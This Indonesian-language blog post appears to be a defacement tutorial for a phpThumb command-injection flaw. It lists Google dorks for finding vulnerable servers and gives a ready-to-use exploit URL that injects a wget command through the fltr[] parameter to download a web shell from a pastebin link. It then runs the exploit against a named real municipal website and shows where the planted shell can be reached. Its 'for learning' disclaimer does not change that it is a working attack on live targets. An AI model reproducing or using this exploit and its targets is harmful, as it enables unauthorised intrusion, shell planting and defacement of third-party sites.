deface phpThumb command injection

deface phpThumb command injection

Dork

inurl:/images/phpThumb.php

inurl:/phpThumb.php

inurl:/ibrowser/script

inurl:/phpThumb/phpThumb.php

Xploit+Shell

/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;wget https://pastebin.com/raw/k5KQVk9X -O namashell.php;&phpThumbDebug=9

Pilih salah 1 webnya masukan xploit

https://pruszyn.gminasiedlce.pl/phpThumbNew/phpThumb.php?

Kalo kayak gitu kemungkinan vuln atau bisa kita ekse..tapi gk harus yg kek gitu,soalnya tampilan biasanya banyak yg beda,ada yang putih ada yang ungu.

Ok langsung kita eksekusi ajah

https://pruszyn.gminasiedlce.pl/phpThumbNew/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;wget https://pastebin.com/raw/k5KQVk9X -O opoo.php;&phpThumbDebug=9

Cara aksesnya?https://pruszyn.gminasiedlce.pl/phpThumbNew/namashell.php

#kalo kurang ngrti komen ajh siapa tau gw jawab V:

#jan diheked buat pembelajaran

deface phpThumb command injection

Post a Comment

0 Comments

Report Abuse

PROFIL

Search This Blog

Arsip

Facebook

Popular Posts

Technote CGI Exploit 0.4 Remote Shell Upload Vulnerability

Responsive Filemanager Cms Formulasi